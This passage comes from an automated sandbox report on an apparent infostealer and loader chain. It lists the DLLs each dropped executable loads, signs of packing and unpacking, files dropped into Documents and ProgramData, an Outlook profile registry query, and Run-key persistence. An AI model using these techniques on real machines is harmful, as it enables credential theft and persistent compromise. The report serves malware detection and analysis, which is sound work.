Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: apphelp.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: winmm.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: wininet.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: sspicli.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: uxtheme.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: mstask.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: windows.storage.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: wldp.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: mpr.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: dui70.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: duser.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: chartv.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: oleacc.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: atlthunk.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: textinputframework.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: coreuicomponents.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: coremessaging.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: ntmarta.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: wintypes.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: wtsapi32.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: winsta.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: textshaping.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: propsys.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: iertutil.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: explorerframe.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: profapi.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: edputil.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: urlmon.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: srvcli.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: netutils.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: appresolver.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: slc.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: userenv.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: sppc.dll
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\file.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: file.exe Static file information: File size 1782784 > 1048576
Source: file.exe Static PE information: Raw size of mvlkjrdz is bigger than: 0x100000 < 0x199800
Source: Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2655139395.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: file.exe, 00000000.00000002.2655673154.000000006CD0F000.00000002.00000001.01000000.00000009.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: e8cb2646d2.exe, 0000001E.00000002.3105997108.0000000000DB2000.00000040.00000001.01000000.00000010.sdmp, e8cb2646d2.exe, 0000001E.00000003.2971584224.0000000004990000.00000004.00001000.00020000.00000000.sdmp, e8cb2646d2.exe, 00000020.00000002.3172278060.0000000000DB2000.00000040.00000001.01000000.00000010.sdmp, e8cb2646d2.exe, 00000020.00000003.3131912525.00000000050E0000.00000004.00001000.00020000.00000000.sdmp, e8cb2646d2.exe, 00000021.00000003.3267299205.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, e8cb2646d2.exe, 00000021.00000002.3307614636.0000000000DB2000.00000040.00000001.01000000.00000010.sdmp
Source: Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2655139395.000000006CB4D000.00000002.00000001.01000000.0000000A.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation
barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\file.exe Unpacked PE file: 0.2.file.exe.5b0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mvlkjrdz:EW;qwnzmlhb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mvlkjrdz:EW;qwnzmlhb:EW;.taggant:EW;
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Unpacked PE file: 22.2.DocumentsCBAKJEHDBG.exe.e40000.0.unpack :EW;.rsrc:W;.idata :W;edckxlhy:EW;fhweoctw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;edckxlhy:EW;fhweoctw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 23.2.skotes.exe.c30000.0.unpack :EW;.rsrc:W;.idata :W;edckxlhy:EW;fhweoctw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;edckxlhy:EW;fhweoctw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 24.2.skotes.exe.c30000.0.unpack :EW;.rsrc:W;.idata :W;edckxlhy:EW;fhweoctw:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;edckxlhy:EW;fhweoctw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Unpacked PE file: 26.2.80b5f835af.exe.5f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mvlkjrdz:EW;qwnzmlhb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mvlkjrdz:EW;qwnzmlhb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Unpacked PE file: 29.2.80b5f835af.exe.5f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mvlkjrdz:EW;qwnzmlhb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mvlkjrdz:EW;qwnzmlhb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Unpacked PE file: 30.2.e8cb2646d2.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W;moxnkmea:EW;wbqgbjdp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005746001\80b5f835af.exe Unpacked PE file: 31.2.80b5f835af.exe.5f0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;mvlkjrdz:EW;qwnzmlhb:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;mvlkjrdz:EW;qwnzmlhb:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Unpacked PE file: 32.2.e8cb2646d2.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W;moxnkmea:EW;wbqgbjdp:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005748001\e8cb2646d2.exe Unpacked PE file: 33.2.e8cb2646d2.exe.db0000.0.unpack :EW;.rsrc:W;.idata :W;moxnkmea:EW;wbqgbjdp:EW;.taggant:EW; vs :ER;.rsrc:W;
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CAD3480 ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ,GetCurrentProcess,GetProcessTimes,LoadLibraryW,GetProcAddress,__Init_thread_footer,__aulldiv,FreeLibrary,GetSystemTimeAsFileTime, 0_2_6CAD3480
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
PE file contains an invalid checksum
Source: DocumentsCBAKJEHDBG.exe.0.dr Static PE information: real checksum: 0x31ade2 should be: 0x317c2c
Source: file.exe Static PE information: real checksum: 0x1baad1 should be: 0x1bc7b8
Source: random[1].exe.0.dr Static PE information: real checksum: 0x1baad1 should be: 0x1bc7b8
Source: skotes.exe.22.dr Static PE information: real checksum: 0x31ade2 should be: 0x317c2c
PE file contains sections with non-standard names
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: .rsrc
Source: file.exe Static PE information: section name: .idata
Source: file.exe Static PE information: section name:
Source: file.exe Static PE information: section name: mvlkjrdz
Source: file.exe Static PE information: section name: qwnzmlhb
Source: file.exe Static PE information: section name: .taggant
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: DocumentsCBAKJEHDBG.exe.0.dr Static PE information: section name:
Source: DocumentsCBAKJEHDBG.exe.0.dr Static PE information: section name: .idata
Source: DocumentsCBAKJEHDBG.exe.0.dr Static PE information: section name: edckxlhy
Source: DocumentsCBAKJEHDBG.exe.0.dr Static PE information: section name: fhweoctw
Source: DocumentsCBAKJEHDBG.exe.0.dr Static PE information: section name: .taggant
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: .rsrc
Source: random[1].exe.0.dr Static PE information: section name: .idata
Source: random[1].exe.0.dr Static PE information: section name:
Source: random[1].exe.0.dr Static PE information: section name: mvlkjrdz
Source: random[1].exe.0.dr Static PE information: section name: qwnzmlhb
Source: random[1].exe.0.dr Static PE information: section name: .taggant
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: skotes.exe.22.dr Static PE information: section name:
Source: skotes.exe.22.dr Static PE information: section name: .idata
Source: skotes.exe.22.dr Static PE information: section name: edckxlhy
Source: skotes.exe.22.dr Static PE information: section name: fhweoctw
Source: skotes.exe.22.dr Static PE information: section name: .taggant
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_6CB0B536 push ecx; ret 0_2_6CB0B549
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E5D91C push ecx; ret 22_2_00E5D92F
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe Code function: 22_2_00E51359 push es; ret 22_2_00E5135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 23_2_00C4D91C push ecx; ret 23_2_00C4D92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 24_2_00C4D91C push ecx; ret 24_2_00C4D92F
Source: file.exe Static PE information: section name: mvlkjrdz entropy: 7.95315931492027
Source: DocumentsCBAKJEHDBG.exe.0.dr Static PE information: section name: entropy: 6.956314316030345
Source: random[1].exe.0.dr Static PE information: section name: mvlkjrdz entropy: 7.95315931492027
Source: skotes.exe.22.dr Static PE information: section name: entropy: 6.956314316030345

Persistence and Installation Behavior
barindex
Drops PE files to the document folder of the user
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsCBAKJEHDBG.exe Jump to dropped file
Drops PE files
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\DocumentsCBAKJEHDBG.exe File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsCBAKJEHDBG.exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\random[1].exe Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\vcruntime140[1].dll Jump to dropped file
Drops PE files to the application program directory (C:\ProgramData)
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\file.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsCBAKJEHDBG.exe Jump to dropped file

Boot Survival
barindex
Creates multiple autostart registry keys
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 80b5f835af.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run e8cb2646d2.exe
Drops PE files to the user root directory
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\user\DocumentsCBAKJEHDBG.exe Jump to dropped file
Monitors registry run keys for changes
